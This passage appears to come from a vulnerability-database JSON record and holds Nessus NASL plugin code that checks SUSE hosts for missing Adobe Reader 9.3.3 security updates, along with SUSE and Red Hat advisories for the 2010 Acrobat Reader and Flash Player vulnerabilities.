script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread_ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:34", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, 
CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).", "edition": 24, "published": "2010-07-09T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-07-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_2_ACROREAD-100706.NASL", "href": "https://www.tenable.com/plugins/nessus/47694", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2664.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47694);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"openSUSE 
Security Update : acroread (openSUSE-SU-2010:0359-1)\");\n script_summary(english:\"Check for the acroread-2664 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-07/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-cmaps-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ja-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ko-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_CN-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_TW-9.3.3-2.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:42", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. 
The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : acroread (SAT Patch Numbers 2639 / 2640)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "id": "SUSE_11_ACROREAD-100702.NASL", "href": "https://www.tenable.com/plugins/nessus/50882", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50882);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : acroread (SAT Patch Numbers 2639 / 2640)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. 
The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1295.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1297.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2201.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2203.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2204.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2205.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2206.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://support.novell.com/security/cve/CVE-2010-2207.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2208.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2212.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 2639 / 2640 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-cmaps-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ja-9.3.3-0.1.1\")) 
flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ko-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-cmaps-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-cmaps-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-ko-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-cmaps-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", 
reference:\"acroread-fonts-ko-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.3.3-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.3.3-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:08:46", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Acrobat Reader was updated to version 9.3.3 to fix lots of security issues and bugs, several of which could be used to execute code by tricking the target user into opening specially crafted PDFs.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-07-08T11:59:38", "published": "2010-07-08T11:59:38", "id": "SUSE-SA:2010:029", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-07/msg00004.html", "type": "suse", "title": "remote code execution in acroread", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", 
"CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "Adobe Flash Player was updated to fix multiple critical security vulnerabilities which allow an attacker to remotely execute arbitrary code or to cause a denial of service.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-06-11T17:44:20", "published": "2010-06-11T17:44:20", "id": "SUSE-SA:2010:024", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00000.html", "type": "suse", "title": "remote code execution in flash-player", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1240", "CVE-2010-1285", "CVE-2010-1295", "CVE-2010-1297", "CVE-2010-2168", "CVE-2010-2201", "CVE-2010-2202", "CVE-2010-2203", "CVE-2010-2204", "CVE-2010-2205", "CVE-2010-2206", "CVE-2010-2207", "CVE-2010-2208", "CVE-2010-2209", "CVE-2010-2210", "CVE-2010-2211", "CVE-2010-2212"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-15, listed in the References section. A specially-crafted PDF file\ncould cause Adobe Reader to crash or, potentially, execute arbitrary code\nas the user running Adobe Reader when opened. (CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-1297, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205, CVE-2010-2206,\nCVE-2010-2207, CVE-2010-2208, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211,\nCVE-2010-2212)\n\nAll Adobe Reader users should install these updated packages. 
They contain\nAdobe Reader version 9.3.3, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\n", "modified": "2017-09-08T12:06:51", "published": "2010-06-30T04:00:00", "id": "RHSA-2010:0503", "href": "https://access.redhat.com/errata/RHSA-2010:0503", "type": "redhat", "title": "(RHSA-2010:0503) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:12", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4546", "CVE-2009-3793", "CVE-2010-1297", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2162", "CVE-2010-2163", "CVE-2010-2164", "CVE-2010-2165", "CVE-2010-2166", "CVE-2010-2167", "CVE-2010-2169", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2172", "CVE-2010-2173", "CVE-2010-2174", "CVE-2010-2175", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2178", "CVE-2010-2179", "CVE-2010-2180", "CVE-2010-2181", "CVE-2010-2182", "CVE-2010-2183", "CVE-2010-2184", "CVE-2010-2185", "CVE-2010-2186", "CVE-2010-2187", "CVE-2010-2188"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed on the Adobe security page APSB10-14,\nlisted in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially-crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially-crafted SWF content. 
(CVE-2009-3793,\nCVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, \nCVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, \nCVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, \nCVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2181, \nCVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, \nCVE-2010-2187, CVE-2010-2188)\n\nAn input sanitization flaw was found in the way flash-plugin processed\ncertain URLs. An attacker could use this flaw to conduct cross-site\nscripting (XSS) attacks if a victim were tricked into visiting a\nspecially-crafted web page. (CVE-2010-2179)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 9.0.277.0.\n", "modified": "2017-07-27T23:10:20", "published": "2010-06-14T04:00:00", "id": "RHSA-2010:0470", "href": "https://access.redhat.com/errata/RHSA-2010:0470", "type": "redhat", "title": "(RHSA-2010:0470) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4546", "CVE-2009-3793", "CVE-2010-1297", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2162", "CVE-2010-2163", "CVE-2010-2164", "CVE-2010-2165", "CVE-2010-2166", "CVE-2010-2167", "CVE-2010-2169", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2173", "CVE-2010-2174", "CVE-2010-2175", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2178", "CVE-2010-2179", "CVE-2010-2180", "CVE-2010-2181", "CVE-2010-2182", "CVE-2010-2183", "CVE-2010-2184", "CVE-2010-2185", "CVE-2010-2186", "CVE-2010-2187", "CVE-2010-2188"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. 
